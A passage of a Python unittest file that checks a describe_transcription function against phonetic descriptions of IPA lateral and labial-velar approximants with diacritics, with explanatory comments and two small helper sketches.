expected = "voiced aspirated pharyngealized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭʰˤ")
self.assertEqual(actual, expected)
def test_ɭ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_retroflex_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized retroflex lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ɭ̬ʰˤ")
self.assertEqual(actual, expected)
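# NOTE (illustrative): every transcription in this file is a base IPA letter
# followed by combining diacritics and spacing modifier letters, which is why
# many groups above assert two visually similar spellings. The two voiceless
# variants differ only in which diacritic they carry: U+0325 COMBINING RING
# BELOW versus U+030A COMBINING RING ABOVE. The standard library makes the
# difference visible:
#
#     >>> import unicodedata
#     >>> [unicodedata.name(ch) for ch in "ɭ̥ʰ"]
#     ['LATIN SMALL LETTER L WITH RETROFLEX HOOK',
#      'COMBINING RING BELOW', 'MODIFIER LETTER SMALL H']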
# voiceless palatal lateral approximant pulmonic egressive consonant
def test_ʎ̊_is_the_representation_of_the_voiceless_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̊")
self.assertEqual(actual, expected)
def test_ʎ̥_is_the_representation_of_the_voiceless_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̥")
self.assertEqual(actual, expected)
# voiceless labialized palatal lateral approximant pulmonic egressive consonant
def test_ʎ̊ʷ_is_the_representation_of_the_voiceless_labialized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless labialized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̊ʷ")
self.assertEqual(actual, expected)
def test_ʎ̥ʷ_is_the_representation_of_the_voiceless_labialized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless labialized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized palatal lateral approximant pulmonic egressive consonant
def test_ʎ̊ʲ_is_the_representation_of_the_voiceless_palatalized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̊ʲ")
self.assertEqual(actual, expected)
def test_ʎ̥ʲ_is_the_representation_of_the_voiceless_palatalized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized palatal lateral approximant pulmonic egressive consonant
def test_ʎ̊ˠ_is_the_representation_of_the_voiceless_velarized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless velarized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̊ˠ")
self.assertEqual(actual, expected)
def test_ʎ̥ˠ_is_the_representation_of_the_voiceless_velarized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless velarized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized palatal lateral approximant pulmonic egressive consonant
def test_ʎ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̊ˤ")
self.assertEqual(actual, expected)
def test_ʎ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated palatal lateral approximant pulmonic egressive consonant
def test_ʎ̥ʰ_is_the_representation_of_the_voiceless_aspirated_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̥ʰ")
self.assertEqual(actual, expected)
def test_ʎ̊ʰ_is_the_representation_of_the_voiceless_aspirated_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized palatal lateral approximant pulmonic egressive consonant
def test_ʎ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ʎ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized palatal lateral approximant pulmonic egressive consonant
def test_ʎ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ʎ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized palatal lateral approximant pulmonic egressive consonant
def test_ʎ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ʎ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized palatal lateral approximant pulmonic egressive consonant
def test_ʎ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ʎ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced palatal lateral approximant pulmonic egressive consonant
def test_ʎ_is_the_representation_of_the_voiced_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ")
self.assertEqual(actual, expected)
# voiced labialized palatal lateral approximant pulmonic egressive consonant
def test_ʎʷ_is_the_representation_of_the_voiced_labialized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced labialized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎʷ")
self.assertEqual(actual, expected)
# voiced palatalized palatal lateral approximant pulmonic egressive consonant
def test_ʎʲ_is_the_representation_of_the_voiced_palatalized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced palatalized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎʲ")
self.assertEqual(actual, expected)
# voiced velarized palatal lateral approximant pulmonic egressive consonant
def test_ʎˠ_is_the_representation_of_the_voiced_velarized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced velarized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized palatal lateral approximant pulmonic egressive consonant
def test_ʎˤ_is_the_representation_of_the_voiced_pharyngealized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎˤ")
self.assertEqual(actual, expected)
# voiced aspirated palatal lateral approximant pulmonic egressive consonant
def test_ʎʰ_is_the_representation_of_the_voiced_aspirated_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎʰ")
self.assertEqual(actual, expected)
def test_ʎ̬ʰ_is_the_representation_of_the_voiced_aspirated_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized palatal lateral approximant pulmonic egressive consonant
def test_ʎʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎʰʷ")
self.assertEqual(actual, expected)
def test_ʎ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized palatal lateral approximant pulmonic egressive consonant
def test_ʎʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎʰʲ")
self.assertEqual(actual, expected)
def test_ʎ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized palatal lateral approximant pulmonic egressive consonant
def test_ʎʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎʰˠ")
self.assertEqual(actual, expected)
def test_ʎ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized palatal lateral approximant pulmonic egressive consonant
def test_ʎʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎʰˤ")
self.assertEqual(actual, expected)
def test_ʎ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_palatal_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized palatal lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʎ̬ʰˤ")
self.assertEqual(actual, expected)
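# Every expected string in these lateral-approximant groups follows one fixed
# template: voicing, optional "aspirated", optional secondary articulation
# (labialized / palatalized / velarized / pharyngealized), place, then
# "lateral approximant pulmonic egressive consonant". A minimal sketch of a
# builder for such strings (hypothetical helper, not used by the generated
# tests):
@staticmethod
def _lateral_approximant_description(voicing, place, aspirated=False, secondary=None):
    # Assemble the description parts in the fixed order used throughout this file.
    parts = [voicing]
    if aspirated:
        parts.append("aspirated")
    if secondary:
        parts.append(secondary)
    parts.append(place)
    parts.append("lateral approximant pulmonic egressive consonant")
    return " ".join(parts)
# e.g. _lateral_approximant_description("voiced", "velar", aspirated=True,
# secondary="pharyngealized") returns "voiced aspirated pharyngealized velar
# lateral approximant pulmonic egressive consonant".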
# voiceless velar lateral approximant pulmonic egressive consonant
def test_ʟ̊_is_the_representation_of_the_voiceless_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̊")
self.assertEqual(actual, expected)
def test_ʟ̥_is_the_representation_of_the_voiceless_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̥")
self.assertEqual(actual, expected)
# voiceless labialized velar lateral approximant pulmonic egressive consonant
def test_ʟ̊ʷ_is_the_representation_of_the_voiceless_labialized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless labialized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̊ʷ")
self.assertEqual(actual, expected)
def test_ʟ̥ʷ_is_the_representation_of_the_voiceless_labialized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless labialized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized velar lateral approximant pulmonic egressive consonant
def test_ʟ̊ʲ_is_the_representation_of_the_voiceless_palatalized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̊ʲ")
self.assertEqual(actual, expected)
def test_ʟ̥ʲ_is_the_representation_of_the_voiceless_palatalized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized velar lateral approximant pulmonic egressive consonant
def test_ʟ̊ˠ_is_the_representation_of_the_voiceless_velarized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless velarized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̊ˠ")
self.assertEqual(actual, expected)
def test_ʟ̥ˠ_is_the_representation_of_the_voiceless_velarized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless velarized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized velar lateral approximant pulmonic egressive consonant
def test_ʟ̊ˤ_is_the_representation_of_the_voiceless_pharyngealized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̊ˤ")
self.assertEqual(actual, expected)
def test_ʟ̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated velar lateral approximant pulmonic egressive consonant
def test_ʟ̥ʰ_is_the_representation_of_the_voiceless_aspirated_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̥ʰ")
self.assertEqual(actual, expected)
def test_ʟ̊ʰ_is_the_representation_of_the_voiceless_aspirated_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̊ʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized velar lateral approximant pulmonic egressive consonant
def test_ʟ̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̥ʰʷ")
self.assertEqual(actual, expected)
def test_ʟ̊ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̊ʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized velar lateral approximant pulmonic egressive consonant
def test_ʟ̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̥ʰʲ")
self.assertEqual(actual, expected)
def test_ʟ̊ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̊ʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized velar lateral approximant pulmonic egressive consonant
def test_ʟ̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̥ʰˠ")
self.assertEqual(actual, expected)
def test_ʟ̊ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̊ʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized velar lateral approximant pulmonic egressive consonant
def test_ʟ̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̥ʰˤ")
self.assertEqual(actual, expected)
def test_ʟ̊ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̊ʰˤ")
self.assertEqual(actual, expected)
# voiced velar lateral approximant pulmonic egressive consonant
def test_ʟ_is_the_representation_of_the_voiced_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ")
self.assertEqual(actual, expected)
# voiced labialized velar lateral approximant pulmonic egressive consonant
def test_ʟʷ_is_the_representation_of_the_voiced_labialized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced labialized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟʷ")
self.assertEqual(actual, expected)
# voiced palatalized velar lateral approximant pulmonic egressive consonant
def test_ʟʲ_is_the_representation_of_the_voiced_palatalized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced palatalized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟʲ")
self.assertEqual(actual, expected)
# voiced velarized velar lateral approximant pulmonic egressive consonant
def test_ʟˠ_is_the_representation_of_the_voiced_velarized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced velarized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟˠ")
self.assertEqual(actual, expected)
# voiced pharyngealized velar lateral approximant pulmonic egressive consonant
def test_ʟˤ_is_the_representation_of_the_voiced_pharyngealized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced pharyngealized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟˤ")
self.assertEqual(actual, expected)
# voiced aspirated velar lateral approximant pulmonic egressive consonant
def test_ʟʰ_is_the_representation_of_the_voiced_aspirated_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟʰ")
self.assertEqual(actual, expected)
def test_ʟ̬ʰ_is_the_representation_of_the_voiced_aspirated_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̬ʰ")
self.assertEqual(actual, expected)
# voiced aspirated labialized velar lateral approximant pulmonic egressive consonant
def test_ʟʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟʰʷ")
self.assertEqual(actual, expected)
def test_ʟ̬ʰʷ_is_the_representation_of_the_voiced_aspirated_labialized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated labialized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̬ʰʷ")
self.assertEqual(actual, expected)
# voiced aspirated palatalized velar lateral approximant pulmonic egressive consonant
def test_ʟʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟʰʲ")
self.assertEqual(actual, expected)
def test_ʟ̬ʰʲ_is_the_representation_of_the_voiced_aspirated_palatalized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated palatalized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̬ʰʲ")
self.assertEqual(actual, expected)
# voiced aspirated velarized velar lateral approximant pulmonic egressive consonant
def test_ʟʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟʰˠ")
self.assertEqual(actual, expected)
def test_ʟ̬ʰˠ_is_the_representation_of_the_voiced_aspirated_velarized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated velarized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̬ʰˠ")
self.assertEqual(actual, expected)
# voiced aspirated pharyngealized velar lateral approximant pulmonic egressive consonant
def test_ʟʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟʰˤ")
self.assertEqual(actual, expected)
def test_ʟ̬ʰˤ_is_the_representation_of_the_voiced_aspirated_pharyngealized_velar_lateral_approximant_pulmonic_egressive_consonant(self):
expected = "voiced aspirated pharyngealized velar lateral approximant pulmonic egressive consonant"
actual = describe_transcription("ʟ̬ʰˤ")
self.assertEqual(actual, expected)
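# The two-way redundancy above (U+0325 vs U+030A for voiceless segments, bare
# letter vs U+032C COMBINING CARON BELOW for voiced ones) could also be
# exercised with a single parametrised check; a minimal sketch using
# unittest's subTest (hypothetical helper, not part of this generated suite):
def _check_equivalent_transcriptions(self, transcriptions, expected):
    # Every spelling in `transcriptions` should describe the same segment.
    for transcription in transcriptions:
        with self.subTest(transcription=transcription):
            self.assertEqual(describe_transcription(transcription), expected)
# e.g. self._check_equivalent_transcriptions(
#     ("ʟ̥ʰ", "ʟ̊ʰ"),
#     "voiceless aspirated velar lateral approximant pulmonic egressive consonant")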
# voiceless labial-velar approximant pulmonic egressive consonant
def test_ẘ_is_the_representation_of_the_voiceless_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("ẘ")
self.assertEqual(actual, expected)
def test_w̥_is_the_representation_of_the_voiceless_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("w̥")
self.assertEqual(actual, expected)
# voiceless labialized labial-velar approximant pulmonic egressive consonant
def test_ẘʷ_is_the_representation_of_the_voiceless_labialized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless labialized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("ẘʷ")
self.assertEqual(actual, expected)
def test_w̥ʷ_is_the_representation_of_the_voiceless_labialized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless labialized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("w̥ʷ")
self.assertEqual(actual, expected)
# voiceless palatalized labial-velar approximant pulmonic egressive consonant
def test_ẘʲ_is_the_representation_of_the_voiceless_palatalized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("ẘʲ")
self.assertEqual(actual, expected)
def test_w̥ʲ_is_the_representation_of_the_voiceless_palatalized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless palatalized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("w̥ʲ")
self.assertEqual(actual, expected)
# voiceless velarized labial-velar approximant pulmonic egressive consonant
def test_ẘˠ_is_the_representation_of_the_voiceless_velarized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless velarized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("ẘˠ")
self.assertEqual(actual, expected)
def test_w̥ˠ_is_the_representation_of_the_voiceless_velarized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless velarized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("w̥ˠ")
self.assertEqual(actual, expected)
# voiceless pharyngealized labial-velar approximant pulmonic egressive consonant
def test_ẘˤ_is_the_representation_of_the_voiceless_pharyngealized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("ẘˤ")
self.assertEqual(actual, expected)
def test_w̥ˤ_is_the_representation_of_the_voiceless_pharyngealized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless pharyngealized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("w̥ˤ")
self.assertEqual(actual, expected)
# voiceless aspirated labial-velar approximant pulmonic egressive consonant
def test_w̥ʰ_is_the_representation_of_the_voiceless_aspirated_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("w̥ʰ")
self.assertEqual(actual, expected)
def test_ẘʰ_is_the_representation_of_the_voiceless_aspirated_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("ẘʰ")
self.assertEqual(actual, expected)
# voiceless aspirated labialized labial-velar approximant pulmonic egressive consonant
def test_w̥ʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("w̥ʰʷ")
self.assertEqual(actual, expected)
def test_ẘʰʷ_is_the_representation_of_the_voiceless_aspirated_labialized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated labialized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("ẘʰʷ")
self.assertEqual(actual, expected)
# voiceless aspirated palatalized labial-velar approximant pulmonic egressive consonant
def test_w̥ʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("w̥ʰʲ")
self.assertEqual(actual, expected)
def test_ẘʰʲ_is_the_representation_of_the_voiceless_aspirated_palatalized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated palatalized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("ẘʰʲ")
self.assertEqual(actual, expected)
# voiceless aspirated velarized labial-velar approximant pulmonic egressive consonant
def test_w̥ʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("w̥ʰˠ")
self.assertEqual(actual, expected)
def test_ẘʰˠ_is_the_representation_of_the_voiceless_aspirated_velarized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated velarized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("ẘʰˠ")
self.assertEqual(actual, expected)
# voiceless aspirated pharyngealized labial-velar approximant pulmonic egressive consonant
def test_w̥ʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("w̥ʰˤ")
self.assertEqual(actual, expected)
def test_ẘʰˤ_is_the_representation_of_the_voiceless_aspirated_pharyngealized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiceless aspirated pharyngealized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("ẘʰˤ")
self.assertEqual(actual, expected)
# voiced labial-velar approximant pulmonic egressive consonant
def test_w_is_the_representation_of_the_voiced_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("w")
self.assertEqual(actual, expected)
# voiced labialized labial-velar approximant pulmonic egressive consonant
def test_wʷ_is_the_representation_of_the_voiced_labialized_labial_velar_approximant_pulmonic_egressive_consonant(self):
expected = "voiced labialized labial-velar approximant pulmonic egressive consonant"
actual = describe_transcription("wʷ")
self.assertEqual(actual, expected)
